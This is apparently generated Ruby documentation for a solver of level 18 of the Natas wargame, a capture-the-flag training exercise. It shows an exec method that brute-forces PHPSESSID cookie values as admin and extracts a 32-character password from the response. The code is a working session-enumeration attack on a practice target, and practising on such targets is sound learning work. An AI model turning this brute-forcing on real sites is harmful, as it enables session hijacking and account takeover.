class NatasLevel18
Level 18
Constants
- LEVEL
- MAX_ID
- PAGE
Public Instance Methods
exec()
click to toggle source
# File lib/natas.rb, line 560 def exec log('Bruteforcing PHPSESSID') MAX_ID.times do |id| data = post( PAGE, { 'Cookie' => "PHPSESSID=#{id}" }, { 'username' => 'admin', 'password' => '' } ).body match = %r(Password: (\w{32})</pre>).match(data) next unless match log("Found session: #{id}") return found(match[1]) end not_found end